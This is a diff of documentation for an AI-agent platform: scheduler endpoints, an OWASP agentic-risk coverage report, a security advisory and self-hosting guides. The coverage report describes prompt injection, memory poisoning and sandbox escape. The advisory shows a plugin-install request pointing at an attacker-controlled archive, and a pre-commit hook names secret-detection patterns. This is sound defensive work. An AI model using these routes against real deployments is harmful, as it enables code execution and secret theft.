| `success` | The A2A message was delivered and the workspace acknowledged it. |
| `error` | The A2A proxy returned a non-2xx status. `last_error` contains details. |
| `skipped` | The workspace was busy (concurrency-aware skip). The scheduler detected `active_tasks > 0` and deferred the run to avoid overloading the agent. |
---
## Schedule Health Endpoint
Peer workspaces can monitor each other's schedule health without admin auth:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/health \
-H "X-Workspace-ID: {callerWorkspaceId}" \
-H "Authorization: Bearer {callerToken}"
```
This endpoint returns execution-state fields only (`last_run_at`,
`last_status`, `run_count`, `next_run_at`, `last_error`). It deliberately
omits `prompt` and `cron_expr` so sensitive task content is never exposed to
peer workspaces.
**Auth rules** (mirrors the A2A proxy pattern):
- `X-Workspace-ID` header required to identify the caller
- Caller's own bearer token validated (legacy workspaces grandfathered)
- `registry.CanCommunicate(callerID, workspaceID)` must return true
- System callers (`system:*`, `webhook:*`, `test:*`) bypass checks
- Self-calls always allowed
---
## Cross-Org Schedule Health (Admin)
Operators can retrieve schedule health for **every workspace in the org** in a single call:
```bash
curl http://localhost:8080/admin/schedules/health \
-H "Authorization: Bearer <admin-token>"
```
Requires `AdminAuth`. Returns an array covering every schedule across every workspace:
```json
[
{
"schedule_id": "uuid",
"workspace_id": "uuid",
"workspace_name": "security-auditor",
"expression": "0 */6 * * *",
"enabled": true,
"last_fired_at": "2026-04-18T12:00:00Z",
"next_scheduled_at": "2026-04-18T18:00:00Z",
"consecutive_empty": 0,
"phantom_detected": false
}
]
```
| Field | Description |
|-------|-------------|
| `last_fired_at` | Timestamp of the most recent run attempt (null if never fired) |
| `next_scheduled_at` | When the scheduler will next attempt this schedule |
| `consecutive_empty` | Count of consecutive runs that fired but received no task completion — an early indicator of a stuck or unresponsive workspace |
| `phantom_detected` | `true` if the schedule appears in the DB but its workspace has been removed; these are safe to delete |
Use this endpoint to audit cron health org-wide before a maintenance window, or to identify schedules that haven't fired when expected.
---
## Scheduler Internals
### Poll Loop
The scheduler runs a 30-second poll loop. Each tick:
1. Queries up to 50 due schedules (`next_run_at <= now AND enabled = true`)
2. Fires up to 10 concurrently via a semaphore
3. Each fire sends an A2A `message/send` with a 5-minute timeout
4. Updates `last_run_at`, `run_count`, `last_status`, and `next_run_at`
5. Logs the run to `activity_logs` with `activity_type = 'cron_run'`
### Panic Recovery
The scheduler recovers from panics inside the tick function. A single bad row,
malformed cron expression, or database blip cannot permanently kill the
scheduler. Without this recovery, the goroutine dies silently and the only
signal is "no crons firing."
### Liveness Watchdog
The scheduler reports heartbeats to the `supervised` subsystem. The
`/admin/liveness` endpoint exposes per-subsystem ages, so operators can detect
a stuck scheduler before it causes a missed-cron outage.
`Scheduler.Healthy()` returns true if the scheduler has completed a tick within
the last 60 seconds (2x the poll interval). Returns false before the first tick
or if the scheduler is stalled.
---
## Examples
### Hourly Security Audit
```json
{
"name": "Hourly Security Scan",
"cron_expr": "0 * * * *",
"timezone": "UTC",
"prompt": "Scan all open PRs for leaked secrets, SQL injection patterns, and auth bypass vulnerabilities. Report findings as a summary."
}
```
### Daily Standup Report
```json
{
"name": "Daily Standup",
"cron_expr": "0 9 * * 1-5",
"timezone": "America/Los_Angeles",
"prompt": "Generate a standup report: what was completed yesterday, what is planned today, and any blockers. Post to the team channel."
}
```
### Weekly Retrospective
```json
{
"name": "Weekly Retro",
"cron_expr": "0 17 * * 5",
"timezone": "America/New_York",
"prompt": "Write a weekly retrospective covering PRs merged, issues closed, cron failures, and code review findings. Post as a GitHub issue."
}
```
### Nightly Cleanup
```json
{
"name": "Nightly Cleanup",
"cron_expr": "0 2 * * *",
"timezone": "UTC",
"prompt": "Archive stale branches older than 30 days. Close issues that have been inactive for 60 days with a comment explaining the auto-close policy.",
"enabled": true
}
```
---
## Timezone Handling
All cron expressions are evaluated in the specified timezone. If no timezone is
provided, `UTC` is used. The timezone must be a valid IANA timezone string
(e.g. `America/New_York`, `Europe/London`, `Asia/Tokyo`).
When a schedule's `cron_expr` or `timezone` is updated, the `next_run_at` is
immediately recomputed using the new values. This prevents schedules from
firing at unexpected times after a timezone change.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List schedules |
| POST | `/workspaces/:id/schedules` | Create schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update schedule |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete schedule |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | Manual trigger |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | Run history (last 20) |
| GET | `/workspaces/:id/schedules/health` | Health view (open to peers) |

View File

@ -0,0 +1,9 @@
---
title: Security
description: Security guides, advisories, and coverage reports for the Molecule AI platform.
---
## In this section
- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
Three HIGH-severity findings for self-hosted operators

View File

@ -0,0 +1,345 @@
---
title: OWASP Agentic AI Top 10 Coverage
description: Mapping the OWASP Agentic AI Top 10 to Molecule AI security controls — honest coverage report.
---
## Overview
This page documents Molecule AI's coverage of the
[OWASP Agentic AI Top 10](https://owasp.org/agentic-ai-top-10/) security risks
for AI agents and agentic systems. Coverage is assessed against the platform as
shipped — not the roadmap or planned features.
**Honest verdict: 5 COVERED / 3 PARTIAL / 2 NOT COVERED**
| OWASP ID | Risk | Status |
|---|---|---|
| [A01](#a01-prompt-injection) | Prompt Injection | ✅ COVERED |
| [A02](#a02-sensitive-information-disclosure) | Sensitive Information Disclosure | ✅ COVERED |
| [A03](#a03-unbounded-resource-consumption) | Unbounded Resource Consumption | ✅ COVERED |
| [A04](#a04-sandboxing-escapes) | Sandboxing Escapes | ⚠️ PARTIAL |
| [A05](#a05-agent-human-relationship-dysfunction) | Agent-Human Relationship Dysfunction | ⚠️ PARTIAL |
| [A06](#a06-memory-poisoning) | Memory Poisoning | ✅ COVERED |
| [A07](#a07-cascade-hallucinations) | Cascade Hallucinations | ✅ COVERED |
| [A08](#a08-overreliance) | Overreliance | ⚠️ PARTIAL |
| [A09](#a09-supply-chain-vulnerabilities) | Supply Chain Vulnerabilities | ❌ NOT COVERED |
| [A10](#a10-improper-agency-grants) | Improper Agency Grants | ❌ NOT COVERED |
---
## A01 — Prompt Injection ✅ COVERED
**Risk:** An attacker embeds malicious instructions in external data (files, web
content, user messages) that the agent treats as authoritative commands.
**Molecule AI controls:**
- **Workspace isolation:** Each workspace runs in its own container with an
isolated filesystem. A prompt injection in workspace A cannot reach workspace
B's memory or secrets.
- **Secrets never in tool context:** Secrets stored via the platform API are
injected into the container's environment at runtime — they are never passed
as tool arguments or embedded in LLM prompts where external data might
reference them.
- **A2A peer validation:** A2A messages between workspaces include sender identity
verification. Agents cannot impersonate another workspace's agent.
- **Admin-level input filtering:** The platform API applies input validation
before data reaches agent prompts.
**Residual risk:** Prompt injection within a single workspace (e.g., a
malicious file processed by the agent) is not neutralized — this is the
responsibility of the agent's own prompt engineering and the LLM's alignment.
---
## A02 — Sensitive Information Disclosure ✅ COVERED
**Risk:** An agent exposes confidential data — credentials, PII, internal
documents — through tool calls, logs, or responses.
**Molecule AI controls:**
- **Encrypted secrets at rest:** Workspace secrets are encrypted with
`SECRETS_ENCRYPTION_KEY` (AES-256) before storage. Plaintext never hits the
database.
- **Secrets scoped per-workspace:** A token scoped to workspace A cannot access
workspace B's secrets.
- **Memory access controls:** The MCP server's memory tools respect workspace
boundaries. Agents cannot read another workspace's memory unless explicitly
  shared via the `memory_set_peer` API.
- **Langfuse observability:** Traces are visible to platform operators; audit
logs show which agent accessed which secret key. Agents should not log
secrets — this is enforced through pre-commit hooks in the workspace template
(the `sk-ant-` / `ghp_` / `AKIA` pattern detector).
- **Token display-once policy:** Workspace bearer tokens are returned in plaintext
exactly once at creation and never shown again.
**Residual risk:** If an agent deliberately calls a tool that prints a secret
value (e.g., `echo $SECRET` in a shell tool), the platform cannot prevent this.
Agent behavior inside the workspace is ultimately constrained by the tools
exposed and the LLM's instruction following.
---
## A03 — Unbounded Resource Consumption ✅ COVERED
**Risk:** An agent makes excessive LLM calls, processes unbounded data, or holds
memory in a loop, causing cost overruns or DoS.
**Molecule AI controls:**
- **Tier-based resource limits:** Each workspace tier has defined memory and CPU
caps enforced by the container scheduler. A runaway agent hits OOM before
consuming unbounded resources.
- **Rate limiting:** The platform enforces `RATE_LIMIT` requests/min per client.
This caps the rate at which agents can issue tool calls or make API requests.
- **Activity retention and cleanup:** `ACTIVITY_RETENTION_DAYS` (default 7) and
`ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6) automatically purge old activity
logs, preventing unbounded log growth.
- **Workspace hibernation:** Idle workspaces can be hibernated, releasing
container resources until the next task arrives.
- **LLM cost tracking:** Workspace usage is tracked per-token-model, giving
operators visibility into spend per workspace.
**Residual risk:** The platform does not enforce per-request token budgets or
LLM call counts within a task. A sophisticated agent can still issue many
calls within a single request burst. Operators should monitor Langfuse traces
for unusual activity patterns.
---
## A04 — Sandboxing Escapes ⚠️ PARTIAL
**Risk:** An agent escapes the container sandbox and accesses the host system,
neighboring containers, or the internal network.
**Molecule AI controls:**
- **Container isolation:** Workspace containers are isolated Docker containers
on the host. They do not run as privileged and have a non-root default user.
- **Bind-mount scoping:** The workspace directory is the only host path bind-mounted
into the container. Other host paths are not accessible.
- **Network namespace isolation:** Workspace containers are on a Docker bridge
network. Direct access to host services requires explicit platform routing.
**Gaps:**
- **Privileged tier (TIER4):** `TIER4_MEMORY_MB` workspaces run with fewer
restrictions. A compromised agent in a TIER4 workspace has more ability to
probe the host. This is a known trade-off for full-host workloads.
- **No seccomp/AppArmor/SELinux profiles:** The platform does not currently
apply mandatory access control profiles beyond Docker's default isolation.
- **No egress filtering by default:** Workspace containers can reach arbitrary
external URLs unless the operator configures network-level egress rules.
**Recommendation:** For untrusted agents, restrict to TIER2 or below. Configure
egress filtering at the Docker host or Kubernetes network policy level.
---
## A05 — Agent-Human Relationship Dysfunction ⚠️ PARTIAL
**Risk:** The human operator loses meaningful oversight of agent actions — the
agent acts without notification, makes irreversible decisions, or misrepresents
its reasoning.
**Molecule AI controls:**
- **A2A `notify_user`:** Agents can push notifications to the canvas, keeping the
human informed of progress and key decisions. This is an opt-in capability for
agents to use.
- **Langfuse observability:** All LLM calls and tool executions are traced.
Platform operators can review the full decision trace for any workspace.
- **Manual override endpoints:** Admins can pause, resume, or terminate any
workspace through the `/admin/*` API endpoints.
- **Activity logs:** All agent actions are logged with timestamps and caller identity.
**Gaps:**
- **`notify_user` is not mandatory:** The workspace template does not require
agents to notify humans of significant actions. An agent can run without
ever pushing a canvas notification.
- **No confirmation gates:** The platform does not provide a mechanism for an
agent to pause and wait for human approval before taking a consequential
action (e.g., deleting a file, sending an external API request).
- **No explanation requirements:** Agents are not required to log their reasoning
before taking actions. Langfuse traces show tool calls but not the agent's
internal chain-of-thought unless the agent explicitly logs it.
**Recommendation:** Configure agents to call `notify_user` at key decision
points. Monitor Langfuse for silent agent activity.
---
## A06 — Memory Poisoning ✅ COVERED
**Risk:** An attacker manipulates the agent's memory store to inject malicious
instructions or biases that the agent reads back and acts on.
**Molecule AI controls:**
- **Memory write authorization:** `memory_set` and `memory_set_peer` require
valid workspace authentication. External attackers cannot write to a
workspace's memory without a valid token.
- **Secrets excluded from memory:** Secrets are stored separately from the
general-purpose memory store and are not readable via the memory tools.
- **Per-workspace memory isolation:** Memory keys are namespaced to the
workspace. Agents in workspace A cannot write to workspace B's memory unless
an explicit A2A `memory_set_peer` call is made from B to A.
- **Semantic search gating:** The `search_memory` tool operates only on the
authenticated workspace's memory. Cross-workspace search is not permitted
without explicit peer delegation.
**Residual risk:** A compromised or malicious agent within a workspace can
overwrite its own memory with poisoned data. This is an agent-level concern,
not a platform-level control.
---
## A07 — Cascade Hallucinations ✅ COVERED
**Risk:** An agent generates incorrect outputs that are fed downstream as
ground-truth, compounding errors across multiple agent calls or tool chains.
**Molecule AI controls:**
- **Langfuse trace visibility:** All agent outputs and tool call results are
captured in Langfuse traces. Operators can identify hallucinated outputs
by reviewing traces, especially when downstream tool calls fail or produce
implausible results.
- **A2A result attribution:** A2A delegation responses include the source
workspace identity and the full execution trace. Consumers of A2A results
can audit where the data came from.
- **Human review via canvas:** Results surfaced via `notify_user` or displayed
in the canvas are visible to humans who can flag hallucinated outputs.
- **Activity logs for audit:** All tool call results are logged. If a downstream
agent acts on hallucinated data, the chain of events is traceable.
**Residual risk:** The platform does not automatically detect or flag
hallucinations — it provides observability. It is the operator's responsibility
to configure confidence thresholds, set up automated result validation where
possible, and review traces for signs of cascade errors.
---
## A08 — Overreliance ⚠️ PARTIAL
**Risk:** Users or automated systems trust an agent's outputs without adequate
verification, leading to harmful decisions based on incorrect agent outputs.
**Molecule AI controls:**
- **Observable decision traces:** Langfuse traces show the full chain of
reasoning and tool calls. Downstream consumers can audit outputs before
acting on them.
- **Canvas notification clarity:** `notify_user` messages are human-readable
summaries — not raw JSON — which can include uncertainty indicators if the
agent is prompted to include them.
- **Tier-based capability limits:** Higher tiers require explicit admin approval
to activate, ensuring operators are aware when a workspace has elevated
capabilities.
**Gaps:**
- **No automated output verification:** The platform does not provide a
built-in mechanism for agents to self-verify outputs (e.g., cross-checking a
code generation against a linter before returning).
- **No confidence scoring surface:** The platform does not currently surface
LLM confidence or probability scores in a structured way. Agents that
include confidence in their outputs are relying on prompting alone.
- **No policy enforcement on agent outputs:** There is no platform-level
mechanism to reject agent outputs that violate defined policies before they
are acted upon.
**Recommendation:** Prompt agents to include uncertainty flags and self-check
steps. Configure downstream systems to require human review for high-stakes
agent outputs.
---
## A09 — Supply Chain Vulnerabilities ❌ NOT COVERED
**Risk:** Vulnerable or malicious dependencies in the agent toolchain — workspace
runtime packages, plugins, adapter libraries, or LLM provider SDKs.
**Molecule AI's position:** This risk is inherited from the broader software
supply chain and is not specifically addressed by the platform at this time.
**What operators must manage independently:**
- Workspace runtime dependencies (`molecule-ai-workspace-runtime` and its
transitive dependencies)
- Plugin dependencies (see
[SAFE-MCP Advisory: G-01](/docs/security/safe-mcp-advisory#g-01-unpinned-npm-mcp-packages--high))
- Workspace template adapter dependencies (Python packages installed by
adapter-specific Dockerfiles)
- LLM provider SDKs and their transitive dependencies
**Mitigation operators should apply:**
- Pin all Python and npm dependencies to exact versions in workspace templates
and plugins
- Use `npm ci` / `pip freeze` and commit lockfiles
- Subscribe to security advisories for all runtime dependencies
- Scan container images for known CVEs before deploying
---
## A10 — Improper Agency Grants ❌ NOT COVERED
**Risk:** An agent is granted more agency (capability to take actions, access
resources, make changes) than it needs — creating blast radius if the agent is
compromised or misbehaves.
**Molecule AI's position:** The platform provides the building blocks for
least-privilege agent design (tier-based caps, per-workspace secrets, scoped
tokens, memory isolation) but does not enforce least-privilege agency at the
agent action level.
**Gaps:**
- **No action-level RBAC:** The MCP server exposes all 87 tools to all
authenticated workspaces. There is no mechanism to restrict a specific
agent's access to a subset of tools (e.g., blocking `delete_workspace` or
`send_channel_message` for a read-only agent).
- **No approval workflow for high-impact actions:** The platform does not
support requiring human approval before an agent executes a high-impact tool
(e.g., deleting a resource, sending an external API request, modifying a
secret).
- **Admin tokens are all-or-nothing:** The `ADMIN_TOKEN` gates all `/admin/*`
endpoints. There is no concept of scoped admin tokens with per-endpoint
permissions.
- **Plugins have full workspace access:** Once a plugin is installed, it
executes within the workspace context with access to all workspace tools and
secrets.
**Recommendation:** Apply defense in depth — restrict MCP tool exposure at the
agent configuration level, use workspace tiers to limit container capabilities,
and review plugin manifests before installation (see
[SAFE-MCP Advisory: G-02](/docs/security/safe-mcp-advisory#g-02-no-manifest-signing--high)).
---
## Coverage methodology
This report was produced by Research Lead (2026-04-18) reviewing platform source
code, configuration defaults, and the deployed security posture against each
OWASP Agentic AI Top 10 category.
**"COVERED"** means the platform provides specific, built-in controls that
mitigate the risk, even if residual risk remains at the agent behavior level.
**"PARTIAL"** means the platform provides some controls but significant gaps
remain that operators must address through configuration or complementary
tooling.
**"NOT COVERED"** means the risk is not addressed by the platform as shipped.
Operators must manage it independently.
---
## Reporting gaps
If you believe a coverage assessment is incorrect or want to propose a new
control for a gap, open an issue in `Molecule-AI/molecule-core` tagged
`security` or reach out through your support channel.

View File

@ -0,0 +1,262 @@
---
title: SAFE-MCP Security Advisory (2026-04-17)
description: High-severity findings from the SAFE-MCP audit and recommended mitigations for self-hosted deployments.
---
## Advisory overview
This advisory documents three HIGH-severity findings from the SAFE-MCP
security audit performed on the Molecule AI platform in April 2026. All three
affect **self-hosted** deployments. If you are using the SaaS offering at
`moleculesai.app`, mitigations are applied server-side — no action needed.
**Published:** April 17, 2026
**Severity:** HIGH (G-01, G-02, G-03)
**Affected versions:** All self-hosted deployments prior to the fixes shipped
in PRs #808 and associated plugin updates.
**Fixed in:** `molecule-core` PRs #808 (platform), #809 (plugin scaffold).
---
## G-01: Unpinned npm MCP packages — HIGH
### Description
The workspace plugin scaffold (`plugins/molecule-ai-plugin-*/package.json`) uses
unpinned version ranges for npm dependencies:
```json
"dependencies": {
"@anthropic-ai/sdk": "^0.32.0"
}
```
The caret (`^`) range means `npm install` can resolve to any compatible version,
including versions with known vulnerabilities or a malicious `next` release
published after the audit date.
### Risk
- Supply chain compromise if a package maintainer publishes a malicious version
- Silent dependency drift as `npm install` pulls newer patch/minor versions
- Potential conflicts with workspace-runtime's own dependency tree
### Recommended mitigation
Pin all npm dependencies to exact versions before deploying:
```bash
# In each plugin directory
npm install --save-exact @anthropic-ai/sdk@0.32.1
npm install --save-exact <other-deps>
```
Add an `.npmrc` to enforce pinned installs:
```ini
save-exact=true
```
Commit `package-lock.json` and verify CI installs from the lockfile:
```bash
npm ci # instead of npm install
```
For the platform build, ensure `npm ci` is used in CI rather than `npm install`
to respect the lockfile.
---
## G-02: No manifest signing — HIGH
### Description
Plugin manifests (`manifest.json`) are served by the platform and executed by
workspace containers without cryptographic verification. There is no mechanism
to confirm that the manifest has not been tampered with after it was published
by the plugin author.
### Risk
- An attacker with write access to the plugin source repository (or the CDN
serving it) could modify `manifest.json` to:
- Inject additional tools that exfiltrate secrets from the workspace
- Redirect API calls to a malicious endpoint
- Add an attacker-controlled `entrypoint` path
### Recommended mitigation
**Short-term:** Inspect `manifest.json` files for all plugins before
enabling them. Verify the `author`, `version`, and `entrypoint` are from a
trusted source. Do not enable plugins from untrusted or unknown authors.
**Long-term:** The platform will add manifest signing aligned with the
OWASP MCPS (MCP Secure) cryptographic security layer. Plugin authors digitally
sign their tool definitions (name, description, inputSchema) with an ECDSA P-256
key pair. The platform verifies signatures against the author's published public
key, computes and stores schema hashes for pinning, and rejects connections where
the schema hash has changed since the last verified session — providing "rug pull
protection." This follows the MCPS L3 trust level: signed tool definitions
required. Track progress in `molecule-core` issue tracker.
Until signing is available, treat plugin manifests as untrusted input.
---
## G-03: Floating plugin references — HIGH
### Description
Workspaces can install plugins by referencing any publicly accessible URL:
```bash
POST /workspaces/:id/plugins
{
"source": "https://github.com/attacker/malicious-plugin/archive/refs/heads/main.tar.gz"
}
```
There is no allowlist, no integrity check, and no review gate on the plugin
URL before the workspace downloads and executes code from it.
### Risk
- Confidential workspace data (secrets, memory, files) is sent to attacker-controlled servers
- Arbitrary code execution within the workspace container
- Lateral movement from the workspace container to internal services
### Recommended mitigations
**1. Restrict plugin installation in your deployment config:**
Add a platform-level environment variable to allow only approved plugin sources.
Until this variable exists, enforce it at the network layer (see below).
**2. Network-level egress filtering:**
Block outbound traffic from workspace containers to all IPs except the
platform API and required external services (LLM providers, vector DBs, etc.).
Workspace containers should not be able to reach arbitrary GitHub archives or
external plugin URLs directly.
Example Fly.io `fly.toml` rule:
```toml
[[vm]]
auto_destroy = false
# App-level egress rules (Fly Private Network)
```
Or use a Kubernetes `NetworkPolicy`:
```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: workspace-egress-lockdown
spec:
podSelector:
matchLabels:
component: workspace
policyTypes:
- Egress
egress:
- to:
- podSelector: {}
ports:
- port: 8080 # platform API
- to:
- namespaceSelector: {}
podSelector:
matchLabels:
app: redis
ports:
- port: 6379
# Block all other egress
```
**3. Plugin allowlist (platform-level):**
Once this flag is available, set `PLUGIN_ALLOW_UNPINNED=false` in your
environment to reject any plugin install requests that reference unpinned or
unverified sources.
---
## Remediation checklist for self-hosted operators
- [ ] Audit all plugin `package.json` files — pin all dependencies to exact versions
*(MCP04: "avoid 'latest' or floating version references")*
- [ ] Verify CI/CD uses `npm ci` not `npm install`
*(MCP04: "no dependency integrity verification")*
- [ ] Commit and push `package-lock.json` for all plugins
- [ ] Add `.npmrc save-exact=true` to all plugin directories
- [ ] Inspect `manifest.json` for any enabled plugin before use
*(MCP04: "MCP connectors or plugins are installed without signing or provenance checks")*
- [ ] Block workspace egress to non-approved hosts at the network level
*(MCP09: "no asset inventory or endpoint discovery process")*
- [ ] Set `PLUGIN_ALLOW_UNPINNED=false` (when available)
*(MCP09: "teams can deploy MCP servers without central registration or security review")*
- [ ] Watch `molecule-core` for the manifest-signing feature
*(MCPS L3: "tool definition signatures required")*
---
## Normative references
The mitigations in this advisory align with the following OWASP publications:
**MCP04:2025 — Software Supply Chain Attacks & Dependency Tampering**
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed G-01 and G-02 mitigations:
- *Signed Components & Provenance Verification:* "Require cryptographic signing for
SDKs, plugins, tool manifests, container images, and validate signatures during
installation and startup."
- *Version Pinning & Approved Registries:* "Pin component versions and avoid
'latest' references. Use internal package mirrors or registries and block direct
downloads from public internet sources."
- *Build SBOM/CBOM Visibility:* "Generate software bill of materials (SBOM) and
cryptographic bill of materials (CBOM) snapshots for each MCP server and plugin
package. Store these alongside deployments for auditing and incident response."
- *Dependency Scanning:* "Apply software composition analysis (SCA) and code
scanning tools to detect known CVEs, malicious indicators, and poisoned transitive
dependencies."
**MCP09:2025 — Shadow MCP Servers**
[*OWASP MCP Top 10, 2025 edition*](https://github.com/OWASP/www-project-mcp-top-10)
Relevant controls that informed the G-03 plugin allowlist mitigation:
- *Central MCP Governance & Registry:* "Create a centralized registry where every
instance must be registered before deployment; tie registration to CI/CD pipelines."
- *Discovery & Continuous Scanning:* "Use network discovery tools to detect open
MCP ports and endpoints; automate weekly shadow MCP detection scans."
- *Baseline Configuration Templates:* "Enforce authentication (mTLS, OAuth), disable
unauthenticated tool calls, include preconfigured logging."
**MCPS — Cryptographic Security Layer for MCP**
[*OWASP MCP Top 10 Recommended Controls*](https://github.com/OWASP/www-project-mcp-top-10/tree/master/2025/recommended-controls)
The MCPS specification defines the Tool Definition Signing approach referenced in
the G-02 long-term mitigation:
- Tool authors sign tool definitions (name, description, inputSchema) with an
ECDSA P-256 private key; clients verify against the author's published public key.
- Schema hashes are computed and stored on first verified connection, then compared
on subsequent connections to detect unauthorized modifications — "rug pull protection."
- MCPS defines four trust levels (L0–L4); the G-02 long-term fix targets L3:
"L3: L2 plus tool definition signatures required."
---
## Reporting security issues
If you discover a new security issue in Molecule AI, please report it via
GitHub Security Advisories on `Molecule-AI/molecule-core` or contact the
security team through your support channel.

View File

@ -0,0 +1,208 @@
---
title: Self-Hosting
description: Run the full Molecule AI stack on your own infrastructure.
---
## Prerequisites
| Requirement | Minimum Version |
|-------------|----------------|
| Docker Desktop | Latest stable |
| Go | 1.25+ |
| Node.js | 20+ |
| Git | 2.x |
## Quick Start
The fastest way to get Molecule AI running locally:
```bash
git clone https://github.com/Molecule-AI/molecule-core.git
cd molecule-core
./scripts/dev-start.sh
# Canvas: http://localhost:3000
# Platform: http://localhost:8080
```
This script starts all infrastructure services, builds the platform, and launches the canvas dev server.
## Infrastructure Setup
Molecule AI depends on four infrastructure services, all managed via `docker-compose.infra.yml` and attached to the shared `molecule-monorepo-net` Docker network:
| Service | Port | Purpose |
|---------|------|---------|
| Postgres | 5432 | Primary datastore (also backs Langfuse and Temporal) |
| Redis | 6379 | Pub/sub, heartbeat TTLs |
| Langfuse | 3001 | LLM trace viewer (backed by ClickHouse) |
| Temporal | 7233 (gRPC), 8233 (Web UI) | Durable workflow engine |
Start infrastructure only:
```bash
./infra/scripts/setup.sh
```
Tear everything down (removes volumes):
```bash
./infra/scripts/nuke.sh
```
## Manual Setup
If you prefer to start each component individually:
### Platform (Go)
```bash
cd platform
go build ./cmd/server
go run ./cmd/server
# Requires Postgres + Redis running
```
The platform must be run from the `platform/` directory, not the repo root.
### Canvas (Next.js)
```bash
cd canvas
npm install
npm run dev
# Dev server on http://localhost:3000
```
### Docker Compose
For infrastructure only:
```bash
docker compose -f docker-compose.infra.yml up -d
```
For the full stack (infrastructure + platform + canvas):
```bash
docker compose up
```
## Environment Variables
### Platform
| Variable | Default | Description |
|----------|---------|-------------|
| `DATABASE_URL` | -- | Postgres connection string (required) |
| `REDIS_URL` | -- | Redis connection string (required) |
| `PORT` | `8080` | Platform HTTP port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers to reach the platform |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Comma-separated allowed origins |
| `SECRETS_ENCRYPTION_KEY` | -- | AES-256 key (32 bytes) for encrypting workspace secrets |
| `WORKSPACE_DIR` | -- | Global fallback host path for `/workspace` bind-mount |
| `MOLECULE_ENV` | -- | Set to `production` to hide E2E helper endpoints |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are retained |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | How often the cleanup job runs |
| `RATE_LIMIT` | `600` | Requests per minute per client |
### Tier Resource Limits
Override per-tier memory and CPU caps for workspace containers. `CPU_SHARES` follows Docker's convention, where 1024 shares equal one CPU.
| Variable | Default | Description |
|----------|---------|-------------|
| `TIER2_MEMORY_MB` | `512` | Standard tier memory limit |
| `TIER2_CPU_SHARES` | `1024` | Standard tier CPU shares |
| `TIER3_MEMORY_MB` | `2048` | Privileged tier memory limit |
| `TIER3_CPU_SHARES` | `2048` | Privileged tier CPU shares |
| `TIER4_MEMORY_MB` | `4096` | Full-host tier memory limit |
| `TIER4_CPU_SHARES` | `4096` | Full-host tier CPU shares |
### Plugin Install Safeguards
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` | Max request body size (64 KiB) |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch and copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` | Max staged-tree size (100 MiB) |
### Canvas
| Variable | Default | Description |
|----------|---------|-------------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Tenant Mode
| Variable | Default | Description |
|----------|---------|-------------|
| `CANVAS_PROXY_URL` | -- | When set, the Go server proxies canvas requests to this URL |
| `MOLECULE_ORG_ID` | -- | UUID for multi-tenant isolation; leave unset for self-hosted |
## Production Deployment
For production, use `platform/Dockerfile.tenant` which builds a combined Go + Canvas image:
```bash
docker build -f platform/Dockerfile.tenant -t molecule-platform .
```
This image serves both the API and the canvas frontend from a single container.
## Security Configuration
### Secrets Encryption
Set `SECRETS_ENCRYPTION_KEY` to a 32-byte AES-256 key to encrypt workspace secrets at rest. Without this variable, secrets are stored in plaintext.
```bash
# Generate a key
openssl rand -hex 32
```
**Warning:** `SECRETS_ENCRYPTION_KEY` cannot be rotated without a data migration. Choose carefully before deploying to production.
### Rate Limiting
The `RATE_LIMIT` variable (default 600 requests/min) applies per client. Adjust based on your expected traffic.
### CORS
Set `CORS_ORIGINS` to a comma-separated list of allowed origins. In production, restrict this to your actual domain.
## Admin Authentication
All `/admin/*` endpoints require `ADMIN_TOKEN`. See
[ADMIN_TOKEN — Production Requirement](/docs/self-hosting/admin-token) for
setup, generation, and fail-open risk details.
**Action required by April 22, 2026:** Set `ADMIN_TOKEN` in all production
deployments before this date.
## Pre-commit Hook
Install the project's pre-commit hooks to enforce code quality:
```bash
git config core.hooksPath .githooks
```
The hook enforces:
- `'use client'` directive on hook-using `.tsx` files
- Dark theme only (no `white` or `light` CSS classes)
- No SQL injection patterns (`fmt.Sprintf` with SQL)
- No leaked secrets (`sk-ant-`, `ghp_`, `AKIA`)
Commits are rejected until all violations are fixed.
## Building Workspace Images
Build the base workspace image for local development:
```bash
bash workspace-template/build-all.sh
```
Adapter-specific images are built from standalone template repos. Each repo's `Dockerfile` installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies.

View File

@ -0,0 +1,104 @@
---
title: ADMIN_TOKEN — Production Requirement
description: Mandatory ADMIN_TOKEN configuration for self-hosted Molecule AI deployments.
---
## Overview
`ADMIN_TOKEN` is a **required** secret for all production Molecule AI deployments.
It gates access to administrative endpoints and must be set before going live.
**Deadline to migrate: April 22, 2026.** Deployments without `ADMIN_TOKEN` set
will begin rejecting `/admin/*` requests after this date.
## What ADMIN_TOKEN is
`ADMIN_TOKEN` is a bearer token that authenticates callers to the platform's
administrative endpoints (`/admin/*`). It is checked by the `AdminAuth`
middleware on every admin route.
## Generating a token
Generate a cryptographically random token:
```bash
openssl rand -base64 32
```
Store the output — it is shown only once and cannot be recovered from the
platform.
## Setting ADMIN_TOKEN in production
### Fly.io (recommended for self-hosted)
```bash
fly secrets set ADMIN_TOKEN="your-generated-token"
fly deploy
```
### Docker / Docker Compose
```yaml
services:
platform:
environment:
ADMIN_TOKEN: "your-generated-token"
```
### Bare-metal / systemd
```bash
export ADMIN_TOKEN="your-generated-token"
./platform-server # or however you start the binary
```
## What ADMIN_TOKEN gates
All `/admin/*` endpoints require `Authorization: Bearer <ADMIN_TOKEN>`:
| Endpoint | Purpose |
|---|---|
